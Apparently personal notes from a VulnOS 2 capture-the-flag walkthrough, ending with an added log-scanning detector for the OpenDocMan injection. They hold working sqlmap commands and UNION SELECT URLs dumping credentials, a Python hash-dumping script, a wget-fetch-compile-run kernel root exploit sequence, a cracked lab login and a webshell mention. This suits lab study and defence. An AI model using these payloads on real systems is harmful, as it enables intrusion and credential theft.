Walkthroughs:
1. https://www.youtube.com/watch?v=s_hlPdWUGLQ [opendocman, Drupal metaexploit didn't work]
2. https://medium.com/@Kan1shka9/vulnos-2-walkthrough-16b70b9fbe17 [same as above. details in text/pix format]
3. https://www.rastating.com/vulnos-2-ctf-walkthrough/ [use python script instead of sqlmap to extract username and hash from DB]
4. https://samueldussault.com/vulnhub/pwning-vulnos-v2-what-do-you-think-of-a-i/ [crafting URL using browser instead of using SQLMAP, droopescan]
Notes:
1. nmap shows ports 80, 22 and IRC on 6667.
1a. Ran the Metasploit exploit (unreal_ircd_3281_backdoor) against 6667 but it didn't work (wasn't getting any session).
2. index.html shows a /jbac/ folder. Ran nikto against the folder and found many folders, including robots.txt.
2a. Opened many folders but not very helpful.
3. Under the documentation tab, found a hidden comment (searched for the word SPAN to help find the comments) which was commented out for a security reason. It revealed another app called OpenDocMan on the server. Looking at the OpenDocMan site also shows the application version.
4. Appears there are some exploits for OpenDocMan (e.g. cp /usr/share/exploitdb/platforms/php/webapps/32075.txt 32075.txt). In the exploit the sqlmap usage is not very explicit, so I used the commands from the video:
4a. sqlmap --dbms MySQL -u 'http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' --batch
4b. sqlmap --dbms MySQL -u 'http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' --batch -D jabcd0cs -T odm_user --dump
(Tried without the --batch parameter and sqlmap asked a few questions, such as whether to crack the password, add a suffix to the password, or which dictionary to use; with --batch it didn't ask.)
The last sqlmap command shows user/password for guest and admin as hashes.
Or use the following syntax:
#sqlmap -u "http://192.168.106.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --level=3
#sqlmap -u "http://192.168.106.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --level=3 -D jabcd0cs --tables
#sqlmap -u "http://192.168.106.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --level=3 -D jabcd0cs -T odm_user --dump
5. You can now crack the password hash and log in as webmin/webmin1980.
6. You could also enable different file types here to see if a webshell works. Alternatively, log in using ssh with that account.
7. Upon checking the kernel, it is vulnerable [https://www.exploit-db.com/exploits/37292/]; download and copy it to the victim machine, compile, chmod 777 and run it to get root access.
7a. wget http://172.16.2.38/37292.c
7b. gcc 37292.c -o 372
7c. chmod 777 372
7d. ./372 ... got root
4. https://samueldussault.com/tag/walkthrough/ [crafting URL using browser instead of using SQLMAP]
Instead of using SQLMAP, here we craft a special URL to extract user and password (using the 32075 vulnerability).
Looking up the software used online, I quickly found this exploit-db post, which describes two major flaws: https://www.exploit-db.com/exploits/32075/. Using the post to craft a special URL, I was then able to confirm that the application was vulnerable to this attack by listing the database tables as follows:
http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,table_name,3,4,5,6,7,8,9 from information_schema.tables
http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,password,3,4,5,6,7,8,9 from odm_user
===
from source
3. https://www.rastating.com/vulnos-2-ctf-walkthrough/ [use python script instead of sqlmap to extract username and hash from DB]
Rather than use this to traverse the database schema, I took a look at the GitHub project and found the database schema (https://gist.github.com/rastating/3153cec9de24fa995a069abe99e75c1d).
I then wrote a small Python script to dump the usernames and password hashes from the odm_user table using the SQL injection:

import requests
import re

# The injected UNION row uses 999 as the <option> value, so each
# "username:hash" pair lands in the option text after 'value=999 >'.
p = re.compile(r'value=999\s>(.+?)</option')
r = requests.get("http://10.2.0.104/jabcd0cs/ajax_udf.php",
                 params={'q': "1",
                         "add_value": "odm_user UNION SELECT 999, concat(username, 0x3a, password), 3,4,5,6,7,8,9 from odm_user"})
for m in p.finditer(r.text):
    print(m.group(1))
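The crafted-URL section and the Python dump script above both abuse the same thing: ajax_udf.php takes add_value as a bare table name and splices it into a query. The following is an added detection example (not code from the notes or from any of the linked walkthroughs) that parses constructed Apache-style access-log lines and flags requests whose add_value is anything other than a plain identifier. The log lines, hosts and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (Apache combined style); addresses are placeholders.
# Lines 2 and 3 mirror the UNION payloads shown in the notes, URL-encoded as a
# browser or requests would send them.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 512
192.0.2.11 - - [01/Jan/2024:10:00:01 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9 HTTP/1.1" 200 640
192.0.2.12 - - [01/Jan/2024:10:00:02 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user+UNION+SELECT+999,concat(username,0x3a,password),3,4,5,6,7,8,9+from+odm_user HTTP/1.1" 200 700
192.0.2.13 - - [01/Jan/2024:10:00:03 +0000] "GET /jabcd0cs/index.php HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)')
# add_value is meant to be a table name, so anything outside [A-Za-z0-9_] is suspect.
TABLE_NAME_RE = re.compile(r'^[A-Za-z0-9_]+$')
SQLI_RE = re.compile(r'\b(union|select|information_schema|concat)\b', re.IGNORECASE)


def classify_add_value(value):
    """Return a reason string if the decoded add_value looks injected, else None."""
    if TABLE_NAME_RE.match(value):
        return None
    if SQLI_RE.search(value):
        return "sql keywords in add_value"
    return "add_value is not a bare identifier"


def find_injection_attempts(log_text):
    """Parse log lines; return (ip, url, reason) for suspicious ajax_udf.php requests."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        if not parts.path.endswith("/ajax_udf.php"):
            continue
        # parse_qs percent-decodes and turns '+' into spaces, matching what PHP sees.
        for decoded in parse_qs(parts.query).get("add_value", []):
            reason = classify_add_value(decoded)
            if reason:
                hits.append((m.group("ip"), m.group("url"), reason))
    return hits


if __name__ == "__main__":
    for ip, url, reason in find_injection_attempts(SAMPLE_LOG):
        print(f"{ip} {reason}: {url}")
```

The same identifier check, applied server-side before add_value reaches the query, is the fix the exploit-db post's flaw implies: a table name that is not a bare identifier should be rejected, not concatenated.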